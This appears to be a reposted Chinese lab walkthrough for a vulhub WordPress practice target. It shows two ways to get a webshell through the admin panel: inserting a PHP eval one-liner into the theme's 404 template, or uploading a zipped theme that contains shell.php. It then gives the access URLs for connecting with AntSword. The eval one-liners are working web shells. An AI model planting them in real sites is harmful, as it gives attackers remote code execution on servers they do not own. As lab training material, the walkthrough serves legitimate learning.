【vulhub/wordpress靶场】------获取webshell
1.进入靶场环境:
输入:cd / vulhub / wordpress / pwnscriptum
修改版本号: vim docker-compose.ymlversion: '3' 保存退出

开启成功,docker ps查看端口 靶场环境8080端口映射到80端口
2. 浏览器访问靶场ip+端口
192.168.182.143:8080
选择简体中文,点击“继续”。
3. 填入信息,进行安装
安装完成,进行登录。
4.获得webshell
4.1 姿势一:后台修改模板拿webshell
4.1.1 修改模板内容

4.1.2 写入一句话木马
在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮<? php eval ( $_POST [ cmd ]);?>


4.1.3 拼接路径,访问文件,蚁剑连接
#拼接路径 /wp-content/themes/twentyfifteen/404.php访问连接: http://192.168.182.143:8080/wp-content/themes/twentyfifteen/404.php

4.2 姿势二:上传主题拿WebShell
4.2.1写入木马文件,和正常的主题模板合并压缩为1.zip文件
写入一句话木马,保存文件为shell.php。<?php @eval($_POST[cmd]);?>



4.2.2 上传主题



4.2.3 拼接路径,访问连接,蚁剑连接
#拼接路径 /wp-content/themes/压缩包解压后文件名/木马文件名.php
该压缩包文件,再上传上去后,会自动解压,从而进行安装主题。此次木马php文件也在解压后的文件里,即在网站根目录且可以访问。
访问:http://192.168.182.143:8080/wp-content/themes/1/shell.php 【这里的1,指的是压缩包解压得到的文件的文件名】

原文地址:https://blog.csdn.net/qq_65379983/article/details/146403429
免责声明:本站文章内容转载自网络资源,如侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!